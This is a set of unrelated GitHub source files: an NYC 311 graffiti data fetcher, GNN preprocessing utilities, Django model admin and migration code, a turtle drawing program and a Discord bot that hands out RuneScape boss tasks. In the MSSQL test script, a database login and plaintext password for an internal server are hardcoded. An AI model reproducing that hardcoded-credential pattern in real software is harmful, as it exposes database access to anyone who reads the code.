daniel.j.wilson@gmail.com
|
ef4629047e768046dd194987c4ad80535fe3c764
|
c4fad14fa55d67d26e3a5d08a8eca8d54b49bd10
|
/Project_Analytic_Code/311_data/get311dataclean.py
|
ff0148561218e2accaec08a5058c42d6ef02413b
|
[] |
no_license
|
sds695/Graffiti_nyc
|
1d98f66dbd5e75255064fcc064348b7f023067c6
|
94c4aaaec01c302e7653c16283df63b8515fb7b9
|
refs/heads/master
| 2020-07-01T06:33:58.825534
| 2019-08-07T20:47:24
| 2019-08-07T20:47:24
| 201,076,492
| 0
| 2
| null | 2019-08-07T20:29:34
| 2019-08-07T15:23:10
| null |
UTF-8
|
Python
| false
| false
| 1,348
|
py
|
#!/usr/bin/env python3 -V
## python xxx.py 1000000 2019-03-01 2019-04-01 Mar2019.csv Mar2019_clean.csv
# not using Sodapy
# try to output print the total row
import csv
import sys
import json
import requests
import pandas as pd
inputLimit = sys.argv[1]
from_ = sys.argv[2]
to_ = sys.argv[3]
file = sys.argv[4]
outputfile = sys.argv[5]
url ="https://data.cityofnewyork.us/resource/fhrw-4uyv.json"
query = "?$where=created_date BETWEEN '"+from_+"' AND '"+to_+"'"+"&$limit="+str(inputLimit)
link = url+query
jsonData = requests.get(link)
results = json.loads(jsonData.text)
keys=set()
n = 0
for d in results:
n+=1
keys.update(d.keys())
print(n)
with open(file,'w',encoding='utf-8') as fi:
output=csv.DictWriter(fi,fieldnames=keys)
output.writeheader()
output.writerows(results)
data_311 = pd.read_csv(file,usecols=['complaint_type','unique_key','latitude','longitude','created_date'])
# df.joined = pd.to_datetime(df.joined, format='%m/%d/%y')
data_311_graffiti = data_311[data_311.complaint_type=='Graffiti']
print(data_311.shape,data_311_graffiti.shape)
data_311_graffiti.drop('complaint_type',axis=1,inplace=True)
data_311_graffiti.dropna(inplace=True)
data_311_graffiti['created_date'] = pd.to_datetime(data_311_graffiti.created_date, format='%Y-%m-%d')
data_311_graffiti.to_csv(outputfile,index=False)
|
[
"noreply@github.com"
] |
sds695.noreply@github.com
|
87ed409979ce273e82d0a5d78486e6781252f9a0
|
fdfe8cb6d56775070a3269132e04dac66703686f
|
/math/0x00-linear_algebra/102-squashed_like_sardines.py
|
4a1549d46261e632ecf8884c64693797b0331dd2
|
[] |
no_license
|
ABERKOUKS/mundiapolis-math
|
6869156af6dc0c6cbbb4f18ad7a5dc0d66aa3109
|
7c3f657ed43e768c88f1e27bf33af09037393403
|
refs/heads/main
| 2023-03-22T03:03:50.981649
| 2021-03-19T22:47:26
| 2021-03-19T22:47:26
| 346,022,472
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 276
|
py
|
#!/usr/bin/env python3
import numpy as np


def cat_matrices(mat1, mat2, axis=0):
    try:
        # concatenate along the requested axis; tolist() returns plain Python lists
        return np.concatenate((mat1, mat2), axis=axis).tolist()
    except ValueError:
        # the shapes are incompatible along that axis
        return None
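# Hedged usage sketch (not part of the original file):
#   cat_matrices([[1, 2]], [[3, 4]], axis=0)   -> [[1, 2], [3, 4]]
#   cat_matrices([[1, 2]], [[3], [4]], axis=0) -> None  (incompatible shapes)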
|
[
"noreply@github.com"
] |
ABERKOUKS.noreply@github.com
|
6f39170e141c34c4ed7e0728026abedadb161926
|
76c0f49248f9cde2dd6126cea74dc7ab6ca02e4d
|
/GNN/utils.py
|
1d9a5d1275d598d181193e1d6d305f1cf903428d
|
[] |
no_license
|
LXD789/Du-FAGNN
|
526ff6de9b3b0e454eca92d0ea108db56a7c2274
|
a334bbc249a15c34280e6f8137e21a1455166bad
|
refs/heads/main
| 2023-07-09T19:54:49.301044
| 2021-08-17T11:35:59
| 2021-08-17T11:35:59
| 369,227,525
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 22,039
|
py
|
import numpy as np
import pickle as pkl
import scipy.sparse as sp
from scipy.sparse.linalg.eigen.arpack import eigsh
import sys
import random
import re
from tqdm import tqdm
import jieba
# import sparse
def parse_index_file(filename):
    """Parse an index file: one integer index per line."""
    index = []
    for line in open(filename):
        # strip() drops only leading/trailing whitespace (spaces, newlines)
        index.append(int(line.strip()))
    return index
def sample_mask(idx, l):
    """Create a boolean mask of length l whose idx positions are True."""
    mask = np.zeros(l)   # e.g. sample_mask([1, 3], 5) -> [F, T, F, T, F]
    mask[idx] = 1
    return np.array(mask, dtype=np.bool)  # 0 -> False, 1 -> True
def load_data(dataset_str):
    """
    Loads input data from gcn/data directory.

    ind.dataset_str.x    => the feature vectors and adjacency matrix of the training instances as list;
    ind.dataset_str.tx   => the feature vectors and adjacency matrix of the test instances as list;
    ind.dataset_str.allx => the feature vectors and adjacency matrix of both labeled and unlabeled training
                            instances (a superset of ind.dataset_str.x) as list;
    ind.dataset_str.y    => the one-hot labels of the labeled training instances as numpy.ndarray object;
    ind.dataset_str.ty   => the one-hot labels of the test instances as numpy.ndarray object;
    ind.dataset_str.ally => the labels for instances in ind.dataset_str.allx as numpy.ndarray object.

    All objects above must be saved using the python pickle module.

    :param dataset_str: Dataset name
    :return: All data input files loaded (as well as the training/test data).
    """
    names = ['x_adj', 'x_embed', 'y', 'tx_adj', 'tx_embed', 'ty', 'allx_adj', 'allx_embed', 'ally']
    objects = []
    # 1. Deserialize every pickled file.
    for i in range(len(names)):
        with open("data/ind.{}.{}".format(dataset_str, names[i]), 'rb') as f:
            if sys.version_info > (3, 0):
                # Python 3 needs latin1 to read pickles written under Python 2
                objects.append(pkl.load(f, encoding='latin1'))
            else:
                objects.append(pkl.load(f))
    x_adj, x_embed, y, tx_adj, tx_embed, ty, allx_adj, allx_embed, ally = tuple(objects)
    # train_idx_ori = parse_index_file("data/{}.train.index".format(dataset_str))
    # train_size = len(train_idx_ori)
    train_adj = []    # adjacency matrices of the training set
    train_embed = []  # feature vectors of the training set
    val_adj = []      # adjacency matrices of the validation set
    val_embed = []    # feature vectors of the validation set
    test_adj = []     # adjacency matrices of the test set
    test_embed = []   # feature vectors of the test set
    # 2. Split adjacency matrices and feature vectors into separate train/val/test
    #    lists (tuples are immutable, hence the copy into lists and arrays).
    for i in range(len(y)):
        adj = x_adj[i].toarray()
        embed = np.array(x_embed[i])
        train_adj.append(adj)
        train_embed.append(embed)
    # the labeled instances of allx beyond y form the validation split
    for i in range(len(y), len(ally)):  # train_size):
        adj = allx_adj[i].toarray()
        embed = np.array(allx_embed[i])
        val_adj.append(adj)
        val_embed.append(embed)
    for i in range(len(ty)):
        adj = tx_adj[i].toarray()
        embed = np.array(tx_embed[i])
        test_adj.append(adj)
        test_embed.append(embed)
    train_adj = np.array(train_adj)
    val_adj = np.array(val_adj)
    test_adj = np.array(test_adj)
    train_embed = np.array(train_embed)
    val_embed = np.array(val_embed)
    test_embed = np.array(test_embed)
    train_y = np.array(y)
    val_y = np.array(ally[len(y):len(ally)])  # train_size])
    test_y = np.array(ty)
    # debug, 2020.9.15:
    # print("ally:", ally)
    # print("val_y:", val_y)
    return train_adj, train_embed, train_y, val_adj, val_embed, val_y, test_adj, test_embed, test_y
def sparse_to_tuple(sparse_mx):
    """Convert sparse matrix to tuple representation."""
    def to_tuple(mx):
        if not sp.isspmatrix_coo(mx):
            # tocoo(): convert to COO format, where data[k] lives at (row[k], col[k]);
            # COO is convenient to build but supports almost no element-wise updates
            mx = mx.tocoo()
        # stack the row and column indices into an (nnz, 2) coordinate array
        coords = np.vstack((mx.row, mx.col)).transpose()
        values = mx.data
        shape = mx.shape
        # debug:
        # print("coords:", coords)
        # print("values:", values)
        # print("shape:", shape)
        return coords, values, shape

    if isinstance(sparse_mx, list):
        for i in range(len(sparse_mx)):
            sparse_mx[i] = to_tuple(sparse_mx[i])
            # print("sparse_mx[i]:", sparse_mx[i])
    else:
        sparse_mx = to_tuple(sparse_mx)
        # print("sparse_mx:", sparse_mx)
    return sparse_mx
    # sample output (test of 2020.9.18):
    # (array([[0, 0],
    #         [0, 1],
    #         [0, 2],
    #         [0, 3],
    #         [0, 4]], dtype=int32), array([ 3,  8,  2,  3, 10]), (1, 5))
def coo_to_tuple(sparse_coo):
    return sparse_coo.coords.T, sparse_coo.data, sparse_coo.shape
    # converts a COO (coordinate) matrix into tuple form:
    # (transposed coordinates, data values, shape)
def preprocess_features(features):
    """Row-normalize feature matrix and convert to tuple representation."""
    # in this variant the matrices are zero-padded to a common row count
    max_length = max([len(f) for f in features])

    for i in tqdm(range(features.shape[0])):  # one feature matrix per document
        feature = np.array(features[i])
        pad = max_length - feature.shape[0]  # padding for each epoch
        # np.pad(a, ((top, bottom), (left, right))): append `pad` zero rows at the bottom
        feature = np.pad(feature, ((0, pad), (0, 0)), mode='constant')  # NOTE (original author): suspected bug here
        features[i] = feature

    return np.array(list(features))
def normalize_adj(adj):
    """Symmetrically normalize adjacency matrix: D^{-1/2} A D^{-1/2}."""
    rowsum = np.array(adj.sum(1))  # node degrees (sum over each row, axis=1)
    with np.errstate(divide='ignore'):  # suppress divide-by-zero warnings
        # d_i^{-1/2}, flattened to a 1-D array
        d_inv_sqrt = np.power(rowsum, -0.5).flatten()
    d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.  # zero-degree nodes: replace inf with 0
    d_mat_inv_sqrt = np.diag(d_inv_sqrt)   # diagonal matrix D^{-1/2}
    return adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt)
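# Hedged worked example (not part of the original file): for adj = [[0, 2], [2, 0]]
# both degrees are 2, so each nonzero entry becomes 2 * (1/sqrt(2)) * (1/sqrt(2)) = 1.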
def preprocess_adj(adj):
    """Preprocessing of adjacency matrix for simple GCN model and conversion to tuple representation."""
    # pad every graph to the largest node count in the batch
    max_length = max([a.shape[0] for a in adj])
    mask = np.zeros((adj.shape[0], max_length, 1))  # mask for padding

    for i in tqdm(range(adj.shape[0])):
        adj_normalized = normalize_adj(adj[i])  # no self-loop
        pad = max_length - adj_normalized.shape[0]  # padding for each epoch
        adj_normalized = np.pad(adj_normalized, ((0, pad), (0, pad)), mode='constant')
        mask[i, :adj[i].shape[0], :] = 1.  # mark the real (unpadded) nodes
        adj[i] = adj_normalized

    return np.array(list(adj)), mask  # coo_to_tuple(sparse.COO(np.array(list(adj)))), mask
def construct_feed_dict(features, support, mask, labels, placeholders):
"""Construct feed dictionary.构造提要字典(将占位符进行赋值)"""
# feed_dict作用:给使用placeholder创建出来的tensor赋值。
feed_dict = dict() # 定义feed_dict为字典类对象
feed_dict.update({placeholders['labels']: labels})
feed_dict.update({placeholders['features']: features})
feed_dict.update({placeholders['support']: support})
feed_dict.update({placeholders['mask']: mask})
feed_dict.update({placeholders['num_features_nonzero']: features[1].shape})
return feed_dict
def chebyshev_polynomials(adj, k):
"""Calculate Chebyshev polynomials up to order k. Return a list of sparse matrices (tuple representation).
计算Chebyshev多项式直至k。 返回稀疏矩阵的列表(元组表示)。"""
print("Calculating Chebyshev polynomials up to order {}...".format(k))
adj_normalized = normalize_adj(adj)
laplacian = sp.eye(adj.shape[0]) - adj_normalized
largest_eigval, _ = eigsh(laplacian, 1, which='LM')
scaled_laplacian = (2. / largest_eigval[0]) * laplacian - sp.eye(adj.shape[0])
t_k = list()
t_k.append(sp.eye(adj.shape[0]))
t_k.append(scaled_laplacian)
def chebyshev_recurrence(t_k_minus_one, t_k_minus_two, scaled_lap):
s_lap = sp.csr_matrix(scaled_lap, copy=True)
return 2 * s_lap.dot(t_k_minus_one) - t_k_minus_two
for i in range(2, k+1):
t_k.append(chebyshev_recurrence(t_k[-1], t_k[-2], scaled_laplacian))
return sparse_to_tuple(t_k)
def loadWord2Vec(filename):
    """Read Word Vectors"""
    vocab = []             # vocabulary list
    embd = []              # embedding list
    word_vector_map = {}   # word -> vector map
    file = open(filename, 'r')
    for line in file.readlines():
        row = line.strip().split(' ')  # strip the line, then split on spaces
        if len(row) > 2:               # only lines with more than two tokens
            vocab.append(row[0])       # the first token is the word itself
            vector = row[1:]           # the remaining tokens are the vector components
            length = len(vector)
            for i in range(length):
                vector[i] = float(vector[i])  # str -> float
            embd.append(vector)
            word_vector_map[row[0]] = vector
    print('Loaded Word Vectors!')
    file.close()
    return vocab, embd, word_vector_map
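# Expected file layout (an assumption inferred from the parsing above): one
# entry per line, the word first and then its vector components, e.g.
#   king 0.12 -0.33 0.58 ...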
def clean_str(string):
    """
    Tokenization/string cleaning for all datasets except for SST.
    Original taken from https://github.com/yoonkim/CNN_sentence/blob/master/process_data.py
    """
    # re.sub(pattern, repl, string, count=0, flags=0): replace every match of
    # `pattern` in `string` with `repl` (count=0 means replace all matches).
    string = re.sub(r"[^A-Za-z0-9(),!?\'\`]", " ", string)
    string = re.sub(r"\'s", " \'s", string)
    string = re.sub(r"\'ve", " \'ve", string)
    string = re.sub(r"n\'t", " n\'t", string)
    string = re.sub(r"\'re", " \'re", string)
    string = re.sub(r"\'d", " \'d", string)
    string = re.sub(r"\'ll", " \'ll", string)
    string = re.sub(r",", " , ", string)
    string = re.sub(r"\)", " \) ", string)
    string = re.sub(r"!", " ! ", string)
    string = re.sub(r"\(", " \( ", string)
    string = re.sub(r"\?", " \? ", string)
    string = re.sub(r"\s{2,}", " ", string)
    # the substitutions that look like no-ops actually insert a space before each
    # symbol (e.g. "'s", "!") so that whitespace tokenization works downstream
    return string.strip().lower()  # lower(): fold to lowercase
def clean_str_sst(string):
"""
    Tokenization/string cleaning for the SST dataset.
"""
string = re.sub(r"[^A-Za-z0-9(),!?\'\`]", " ", string)
string = re.sub(r"\s{2,}", " ", string)
return string.strip().lower()
# def clean_ch_str(string):  # clean Chinese data
# load_data("mr")  # test, 2020.9.16
# row = [1, 2, 3, 3, 2]
# col = [1, 3, 4, 2, 3]
# data = [3, 8, 2, 3, 10]
# c = sp.coo_matrix(data)
# # print("c1:", c)
# sparse_to_tuple(c)
# print("c2:", c)
# test, 2020.9.18
|
[
"liuxiaodijx@163.com"
] |
liuxiaodijx@163.com
|
bae30772978c282874e45e1e767430be19ec94f9
|
7d81464b641105a1dcf2b7ff21b1c03931734367
|
/MSSQLtest/testconn.py
|
df2a37f52d7055c64a90e42c78423a4d4ccd0b3d
|
[] |
no_license
|
Syxoyi/potential-enigma
|
140dbd11bf7adc00a72ef315fcf39ec45d820b62
|
020aead1b48bd8dd944786151812158fab6c71af
|
refs/heads/master
| 2021-02-10T12:15:57.307328
| 2020-09-11T15:10:03
| 2020-09-11T15:10:03
| 244,380,999
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 881
|
py
|
#!/usr/bin/python3
import pyodbc
#driver = 'DRIVER={SQL Server}'
#driver = 'DRIVER=/opt/microsoft/msodbcsql17/lib64/libmsodbcsql-17.6.so.1.1'
driver = 'DRIVER=/opt/microsoft/msodbcsql17/lib64/libmsodbcsql-17.4.so.2.1'
server = 'SERVER=10.0.50.108'
#server = 'SERVER=10.10.5.153'
port = 'PORT=1433'
db = 'DATABASE=max'
#db = 'DATABASE=barkp'
user = 'UID=max'
#user = 'UID=exp'
pw = 'PWD=Qwerty1234'
#pw = 'PWD=exp123'
conn_str = ';'.join([driver, server, port, db, user, pw])
conn = pyodbc.connect(conn_str)
cursor = conn.cursor()
cursor.execute('SELECT TOP 5 * FROM barcodes')
rest_of_rows = cursor.fetchall()
for line in rest_of_rows:
print(line)
#row = cursor.fetchone()
#rest_of_rows = cursor.fetchall()
#print(rest_of_rows)
#cnx = pyodbc.connect("DSN=srv;DATABASE=base;UID=user;PWD=123" )
#cursor = cnx.cursor()
#cursor.execute("SELECT [IP],[Name] FROM [Nodes]")
|
[
"m.travushkin@r77.center-inform.ru"
] |
m.travushkin@r77.center-inform.ru
|
ecdeb18eec3797104113fe832ecf9a0550103af3
|
60ff8ff7b318e8e2a3d43ef161106ca0a61a8751
|
/experiments/waffle01.py
|
e59b7e8117e5c084919a8ba79ce59741c3483274
|
[] |
no_license
|
NUSTEM-UK/ROR
|
8a3029a3b0ad2158d7f15b560e0436c7b2c3a6dc
|
e4f80c7fcb70d6b447a87959fd7d841174a7fd40
|
refs/heads/master
| 2021-05-08T04:23:30.866350
| 2017-12-22T11:24:35
| 2017-12-22T11:24:35
| 108,391,348
| 0
| 0
| null | 2017-12-22T11:20:05
| 2017-10-26T09:36:35
|
Python
|
UTF-8
|
Python
| false
| false
| 450
|
py
|
# Installed GUIzero on the Mac with:
# sudo pip install git+https://github.com/lawsie/guizero.git@version-0.4
# (to get the prerelease version with clickable waffle installed)
# NB. needs to run under python3, which is a bit of a pain in VS Code.
from guizero import App, Waffle
app = App()
my_waffle = Waffle(app, remember=True)
my_waffle.set_pixel(2, 1, "red")
print(my_waffle.get_pixel(2, 1))
print(my_waffle.get_pixel(1, 1))
app.display()
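# Note (added for clarity): remember=True makes the Waffle track pixel
# colours, which is what lets the get_pixel() calls above return "red" for
# (2, 1) and the untouched default colour for (1, 1).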
|
[
"jonathan.sanderson@northumbria.ac.uk"
] |
jonathan.sanderson@northumbria.ac.uk
|
fc1a44026c9b959cef7c38b8b9b4a9c58a28871a
|
294913d851693cbf9e56a2e2ca92a6225b6b528e
|
/salty_web_app/venv/bin/python-config
|
471a428afb294d01544cc88a67befa89fc730a37
|
[] |
no_license
|
yatong2/saltywebapp
|
40871c47a46ee8230698bba7f9b1c17c386068a3
|
75941c223816f40f4a550aec34b3d5b986b70f01
|
refs/heads/master
| 2020-12-03T00:03:37.027111
| 2017-07-06T18:09:38
| 2017-07-06T18:09:38
| 95,979,629
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,361
|
#!/Users/yatongge/projects/myhellowebapp/venv/bin/python
import sys
import getopt
import sysconfig
valid_opts = ['prefix', 'exec-prefix', 'includes', 'libs', 'cflags',
'ldflags', 'help']
if sys.version_info >= (3, 2):
valid_opts.insert(-1, 'extension-suffix')
valid_opts.append('abiflags')
if sys.version_info >= (3, 3):
valid_opts.append('configdir')
def exit_with_usage(code=1):
sys.stderr.write("Usage: {0} [{1}]\n".format(
sys.argv[0], '|'.join('--'+opt for opt in valid_opts)))
sys.exit(code)
try:
opts, args = getopt.getopt(sys.argv[1:], '', valid_opts)
except getopt.error:
exit_with_usage()
if not opts:
exit_with_usage()
pyver = sysconfig.get_config_var('VERSION')
getvar = sysconfig.get_config_var
opt_flags = [flag for (flag, val) in opts]
if '--help' in opt_flags:
exit_with_usage(code=0)
for opt in opt_flags:
if opt == '--prefix':
print(sysconfig.get_config_var('prefix'))
elif opt == '--exec-prefix':
print(sysconfig.get_config_var('exec_prefix'))
elif opt in ('--includes', '--cflags'):
flags = ['-I' + sysconfig.get_path('include'),
'-I' + sysconfig.get_path('platinclude')]
if opt == '--cflags':
flags.extend(getvar('CFLAGS').split())
print(' '.join(flags))
elif opt in ('--libs', '--ldflags'):
abiflags = getattr(sys, 'abiflags', '')
libs = ['-lpython' + pyver + abiflags]
libs += getvar('LIBS').split()
libs += getvar('SYSLIBS').split()
# add the prefix/lib/pythonX.Y/config dir, but only if there is no
# shared library in prefix/lib/.
if opt == '--ldflags':
if not getvar('Py_ENABLE_SHARED'):
libs.insert(0, '-L' + getvar('LIBPL'))
if not getvar('PYTHONFRAMEWORK'):
libs.extend(getvar('LINKFORSHARED').split())
print(' '.join(libs))
elif opt == '--extension-suffix':
ext_suffix = sysconfig.get_config_var('EXT_SUFFIX')
if ext_suffix is None:
ext_suffix = sysconfig.get_config_var('SO')
print(ext_suffix)
elif opt == '--abiflags':
if not getattr(sys, 'abiflags', None):
exit_with_usage()
print(sys.abiflags)
elif opt == '--configdir':
print(sysconfig.get_config_var('LIBPL'))
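# Example invocation (added for illustration; the exact output depends on the
# local Python build, so the paths shown below are assumptions):
#
#   $ python-config --includes
#   -I/usr/local/include/python3.6m -I/usr/local/include/python3.6m
#   $ python-config --ldflags
#   -L/usr/local/lib/python3.6/config-3.6m -lpython3.6m -ldl -framework CoreFoundation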
|
[
"yatong2@uw.edu"
] |
yatong2@uw.edu
|
|
664688a10ed4eb76cb8d47f45a8895f4498ef8ec
|
9e4c444e6e936fda3cbdd237c1101bf6a59bedaf
|
/Mutant Rainbow Graphics.py
|
0af1a8c75e155de45fd6a29780c1576d5cdd9717
|
[] |
no_license
|
Liam-McQueen04/Mutant-Rainbow-Graphics
|
7a0d6cfdae50aceafd527ae2d9e353f4427301d7
|
db337888c0123f9bade814a88fd1efebbdc0628a
|
refs/heads/master
| 2020-04-06T19:03:19.657347
| 2018-11-15T14:25:52
| 2018-11-15T14:25:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,427
|
py
|
import random
import turtle as t
def get_line_length():
choice = input('Enter Line Length (long, medium, short): ')
if choice == 'long':
line_length = 250
elif choice == 'medium':
line_length = 200
else:
line_length = 100
return line_length
def get_line_width():
choice = input('Enter line width (superthick, thick, thin): ')
if choice == 'superthick':
line_width = 40
elif choice == 'thick':
line_width = 25
else:
line_width = 10
return line_width
def inside_window():
left_limit = (-t.window_width() / 2) + 100
right_limit = (t.window_width() / 2) - 100
top_limit = (t.window_height() / 2) - 100
bottom_limit = (-t.window_height() / 2) + 100
(x, y) = t.pos()
inside = left_limit < x < right_limit and bottom_limit < y < top_limit
return inside
def move_turtle(line_length):
pen_colors = ['red', 'orange', 'yellow', 'green', 'blue', 'purple']
t.pencolor(random.choice(pen_colors))
if inside_window():
angle = random.randint(0, 180)
t.right(angle)
t.forward(line_length)
else:
t.backward(line_length)
line_length = get_line_length()
line_width = get_line_width()
t.shape('turtle')
t.fillcolor('green')
t.bgcolor('black')
t.speed('fastest')
t.pensize(line_width)
while True:
move_turtle(line_length)
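# A bounded variant (illustrative, not part of the original): the while-loop
# above never exits, so a fixed number of segments plus exitonclick() can be
# used instead when a finite drawing is wanted.
#
#   for _ in range(200):
#       move_turtle(line_length)
#   t.exitonclick()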
|
[
"noreply@github.com"
] |
Liam-McQueen04.noreply@github.com
|
de37a1fd81c01c4d429d643d284ac7ace28482c3
|
331460bcb59700d9301356cdf48c0230364b5984
|
/programmers/level1/[연습문제] 짝수와 홀수.py
|
25b51fb8b49bc64acd4da0d531e1d8630c5a1202
|
[] |
no_license
|
leeyongjoo/solved-algorithm-problem
|
c109dbf272df59ba1d79e3da825a4e75f98085a1
|
6a0f8424b95283ca16f3e5f84904a8fcd5bd3eab
|
refs/heads/master
| 2023-07-11T20:36:32.389618
| 2021-08-23T13:54:17
| 2021-08-23T13:54:17
| 283,757,782
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 275
|
py
|
# https://programmers.co.kr/learn/courses/30/lessons/12937?language=python3
def solution(num):
return "Odd" if num % 2 else "Even"
if __name__ == "__main__":
print(solution(3))
print(solution(3) == "Odd")
print(solution(4))
print(solution(4) == "Even")
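# An equivalent indexing idiom (illustrative, not part of the original):
# ("Even", "Odd")[num % 2] returns the same result, since num % 2 is 0 or 1.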
|
[
"2yongjooo@gmail.com"
] |
2yongjooo@gmail.com
|
3d926895422768d1af337ed0e80b73d5d0572720
|
39f51de39b6c3bdc5d7bb9a570ab33c308221f57
|
/horseraceai/races/admin.py
|
2f90f6df3c4675026d1a3175d9bd18bde6e13bfd
|
[] |
no_license
|
monda00/horseracing_ai_app
|
d64e10dc096ff51f9e9c5d473345f6cf8824041f
|
8590cf85459e4a0e6790b449bcfb298ce50afb96
|
refs/heads/master
| 2021-07-09T02:05:01.418413
| 2020-12-15T15:40:02
| 2020-12-15T15:40:02
| 220,805,477
| 0
| 0
| null | 2020-07-20T17:01:07
| 2019-11-10T14:57:27
|
Python
|
UTF-8
|
Python
| false
| false
| 688
|
py
|
from django.contrib import admin
from import_export.admin import ImportExportModelAdmin
from import_export import resources
from .models import Race, Horse
class RaceResource(resources.ModelResource):
class Meta:
model = Race
import_id_fields = ['race_id']
skip_unchanged = True
report_skipped = False
class HorseResource(resources.ModelResource):
class Meta:
model = Horse
skip_unchanged = True
report_skipped = False
@admin.register(Race)
class RaceAdmin(ImportExportModelAdmin):
resource_class = RaceResource
@admin.register(Horse)
class HorseAdmin(ImportExportModelAdmin):
resource_class = HorseResource
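# Illustrative note (not part of the original): the resource classes can also
# be used programmatically; for example, RaceResource().export() returns a
# tablib Dataset whose .csv attribute holds the exported rows.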
|
[
"monda0524@gmail.com"
] |
monda0524@gmail.com
|
9d687faa4cc8c5b083d36e051367de1ddccc50df
|
5b1baef4e0c50e4aafeadcbb1f199a1de7d4f0ee
|
/mysite/app/migrations/0013_auto_20210730_1419.py
|
0f29f159ef5cfd95c59632c0cbc06eabe868883a
|
[] |
no_license
|
qqzii/testsite
|
278a512000715c3eb6b7b1cd0cb6a19760d77162
|
ccbdda7261a69501d4ddfcf6be8a55c3766bfb02
|
refs/heads/master
| 2023-07-09T09:41:22.981390
| 2021-08-12T13:58:21
| 2021-08-12T13:58:21
| 382,126,006
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,215
|
py
|
# Generated by Django 3.2.5 on 2021-07-30 11:19
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('app', '0012_auto_20210729_0224'),
]
operations = [
migrations.CreateModel(
name='Order',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('first_name', models.CharField(max_length=255, verbose_name='First name')),
                ('last_name', models.CharField(max_length=255, verbose_name='Last name')),
                ('phone', models.CharField(max_length=20, verbose_name='Phone')),
                ('address', models.CharField(blank=True, max_length=1024, null=True, verbose_name='Address')),
                ('status', models.CharField(choices=[('new', 'New order'), ('in_progress', 'Order in progress'), ('is_ready', 'Order ready'), ('completed', 'Order completed')], default='new', max_length=100, verbose_name='Order status')),
                ('buying_type', models.CharField(choices=[('self', 'Pickup'), ('delivery', 'Delivery')], default='self', max_length=100, verbose_name='Order type')),
                ('comment', models.TextField(blank=True, null=True, verbose_name='Order comment')),
                ('created_at', models.DateTimeField(auto_now=True, verbose_name='Order creation date')),
                ('order_date', models.DateField(default=django.utils.timezone.now, verbose_name='Order receipt date')),
                ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_orders', to='app.customer', verbose_name='Customer')),
],
),
migrations.AddField(
model_name='customer',
name='orders',
            field=models.ManyToManyField(related_name='related_customer', to='app.Order', verbose_name="Customer's orders"),
),
]
|
[
"artemiy.morozov.00@mail.ru"
] |
artemiy.morozov.00@mail.ru
|
992162bc096471c678c0d61d5249187430dea1ba
|
545fcb85117f04064c5f8095ca1adfa96fd383de
|
/main.py
|
e096a688714be466305798429e1000a10332d485
|
[] |
no_license
|
quintanamo/rs-reaper-bot
|
1c5805e5bf4a83001eec039cc03ad93e658d8c79
|
8ee51e752f17598ac5177956917946ba4526e59c
|
refs/heads/master
| 2023-04-22T07:03:51.873668
| 2021-05-08T05:27:31
| 2021-05-08T05:27:31
| 365,419,910
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,935
|
py
|
import discord
import random
import math
# get token from file (strip the trailing newline, which would otherwise break login)
with open('token.txt', 'r') as f:
    token = f.readline().strip()
# list of possible bosses
bossList = {
'Ambassador': {'min': 2, 'max': 2},
'Araxxi': {'min': 3, 'max': 4},
'The Barrows Brothers': {'min': 4, 'max': 15},
'Barrows: Rise of the Six': {'min': 3, 'max': 4},
'Black stone dragon': {'min': 2, 'max': 2},
'Chaos Elemental': {'min': 2, 'max': 5},
'Commander Zilyana': {'min': 10, 'max': 15},
'Corporeal Beast': {'min': 5, 'max': 10},
'Dagannoth Kings': {'min': 10, 'max': 15},
'General Graardor': {'min': 10, 'max': 15},
'Giant Mole': {'min': 3, 'max': 8},
'Gregorovic': {'min': 5, 'max': 10},
'Har-Aken': {'min': 1, 'max': 2},
'Helwyr': {'min': 5, 'max': 10},
'Kalphite King': {'min': 10, 'max': 15},
'Kalphite Queen': {'min': 4, 'max': 10},
'King Black Dragon': {'min': 4, 'max': 14},
'Kree\'arra': {'min': 10, 'max': 15},
'K\'ril Tsutsaroth': {'min': 10, 'max': 15},
'Legiones': {'min': 10, 'max': 15},
'The Magister': {'min': 3, 'max': 7},
'Nex': {'min': 5, 'max': 10},
'Nex: Angel of Death': {'min': 3, 'max': 6},
'Queen Black Dragon': {'min': 5, 'max': 10},
'Raksha, the Shadow Colossus': {'min': 3, 'max': 4},
'Rex Matriarchs': {'min': 10, 'max': 15},
'Solak': {'min': 2, 'max': 4},
'Seiryu the Azure Serpent': {'min': 2, 'max': 2},
'Telos': {'min': 3, 'max': 4},
'The Twin Furies': {'min': 5, 'max': 10},
'TzTok-Jad': {'min': 1, 'max': 2},
'Vindicta & Gorvek': {'min': 5, 'max': 10},
'Vorago': {'min': 3, 'max': 4}
}
client = discord.Client()
@client.event
async def on_ready():
print('Started bot as user {0.user}'.format(client))
@client.event
async def on_message(message):
if message.author == client.user:
return
if message.content.startswith('!reaper'):
commands = message.content.split()
        if len(commands) > 1 and commands[1].lower() == 'task':
bosses = list(bossList.keys())
task = bosses[random.randrange(len(bosses))]
numberToKill = random.randint(bossList[task]['min'], bossList[task]['max'])
if(len(commands) > 2 and commands[2].lower() == 'extend'):
numberToKill = (1.5 * numberToKill) + 2
numberToKill = math.floor(numberToKill)
numberString = 'souls'
if numberToKill == 1:
numberString = 'soul'
image = ''.join(e for e in task if e.isalnum())
image = 'images/' + image.lower() + '.png'
print(image)
            #await message.channel.send(f'Collect souls from {task} for me.')
await message.channel.send(file=discord.File(image), content="Collect " + str(numberToKill) + " " + numberString + " from " + task + " for me.")
client.run(token)
# https://discord.com/api/oauth2/authorize?client_id=840438597089624065&permissions=34816&scope=bot
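# Portability note (added): this script targets the pre-2.0 discord.py API.
# With discord.py 2.x, explicit intents are required, e.g.:
#   intents = discord.Intents.default()
#   intents.message_content = True
#   client = discord.Client(intents=intents)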
|
[
"qherb@ycp.edu"
] |
qherb@ycp.edu
|
